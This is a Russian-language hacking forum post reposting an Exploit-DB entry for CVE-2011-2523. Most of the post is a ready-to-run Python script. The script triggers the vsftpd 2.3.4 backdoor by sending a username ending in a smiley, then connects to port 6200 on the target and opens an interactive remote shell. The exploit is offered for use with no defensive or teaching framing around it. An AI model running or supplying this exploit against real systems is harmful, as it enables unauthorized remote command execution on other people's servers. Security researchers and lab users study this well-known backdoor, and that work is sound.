Exploit vsftpd 2.3.4 - Backdoor Command Execution

  • Автор темы Exploiter
  • Дата начала
  • Просмотров 2741 Просмотров

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
49757
Проверка EDB
  1. Пройдено
Автор
HERCULESRD
Тип уязвимости
REMOTE
Платформа
UNIX
CVE
cve-2011-2523
Дата публикации
2021-04-12
vsftpd 2.3.4 - Backdoor Command Execution
Код:
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523

#!/usr/bin/python3   
                                                           
from telnetlib import Telnet 
import argparse
from signal import signal, SIGINT
from sys import exit

def handler(signal_received, frame):
    # Handle any cleanup here
    print('   [+]Exiting...')
    exit(0)

signal(SIGINT, handler)                           
parser=argparse.ArgumentParser()        
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()       
host = args.host                        
portFTP = 21 #if necessary edit this line

user="USER nergal:)"
password="PASS pass"

tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")

tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
 
Источник
www.exploit-db.com

Похожие темы